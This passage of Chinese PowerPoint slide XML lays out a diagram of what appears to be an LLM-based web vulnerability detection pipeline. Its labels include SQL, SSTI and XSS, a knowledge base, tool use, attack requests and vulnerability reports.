                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="108" name="图片 107"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="6753" y="4052"/>
              <a:ext cx="850" cy="723"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="文本框 108"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10407" y="3870"/>
              <a:ext cx="1352"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数据流</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name="文本框 112"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4450" y="6267"/>
              <a:ext cx="2101" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="125" name="图片 124"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5920" y="5207"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="文本框 125"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2891" y="4438"/>
              <a:ext cx="1563" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="127" name="文本框 126"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2851" y="4851"/>
              <a:ext cx="1603" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>SSTI</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="文本框 127"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2955" y="5255"/>
              <a:ext cx="1499" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>XSS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="130" name="文本框 129"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3897" y="5606"/>
              <a:ext cx="723" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="131" name="图片 130"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3224" y="7068"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="132" name="文本框 131"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3114" y="7918"/>
              <a:ext cx="1108"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知识库</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="135" name="图片 134"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1909" y="7020"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="136" name="文本框 135"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1776" y="7918"/>
              <a:ext cx="1348" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>Tool-use</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="线形标注 1(带强调线) 136"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1399" y="4527"/>
              <a:ext cx="2914" cy="1307"/>
            </a:xfrm>
            <a:prstGeom prst="accentCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 42999"/>
                <a:gd name="adj2" fmla="val -8304"/>
                <a:gd name="adj3" fmla="val 64957"/>
                <a:gd name="adj4" fmla="val -16918"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff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sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="圆角矩形 137"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1570" y="6885"/>
              <a:ext cx="2880" cy="1484"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg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600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="139" name="图片 138"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5035" y="6422"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="150" name="图片 149"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId16"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4910" y="5058"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="151" name="图片 150"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4896" y="7067"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="152" name="文本框 151"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4655" y="7955"/>
              <a:ext cx="1390" cy="414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>LLM</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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="156" name="文本框 155"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4433" y="5957"/>
              <a:ext cx="1990" cy="414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>漏洞检测策略</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="157" name="图片 156"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4910" y="9100"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158" name="文本框 157"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4754" y="9967"/>
              <a:ext cx="1306" cy="458"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>攻击请求</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="159" name="图片 158"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="5035" y="8369"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="160" name="图片 159"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId17"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3373" y="9099"/>
              <a:ext cx="850" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name="文本框 160"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3213" y="9963"/>
              <a:ext cx="1390" cy="414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>漏洞报告</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="文本框 161"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16012" y="7095"/>
              <a:ext cx="1750" cy="414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>LLM</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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="163" name="文本框 162"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11889" y="3010"/>
              <a:ext cx="1750" cy="414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>LLM</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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="164" name="文本框 163"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1909" y="5842"/>
              <a:ext cx="1991" cy="630"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>漏洞检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="文本框 164"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12190" y="802"/>
              <a:ext cx="1991" cy="630"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>页面</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>探索</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="166" name="文本框 165"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14305" y="5176"/>
              <a:ext cx="1991" cy="630"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>场景塑造</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4305" y="9184"/>
              <a:ext cx="548" cy="587"/>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设计背景</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检测从“盲打”到“精</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打”</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nvGrpSpPr>
          <p:cNvPr id="11" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="381635" y="2824480"/>
            <a:ext cx="8205470" cy="539750"/>
            <a:chOff x="405" y="1797"/>
            <a:chExt cx="12922" cy="850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="圆角矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="405" y="1797"/>
              <a:ext cx="10481" cy="850"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="95000"/>
                <a:lumOff val="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custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601" y="1933"/>
              <a:ext cx="12726" cy="58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控制依赖</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用户登录</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获取令牌</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后台权限</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操作</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="381635" y="3546475"/>
            <a:ext cx="8205470" cy="539750"/>
            <a:chOff x="405" y="1797"/>
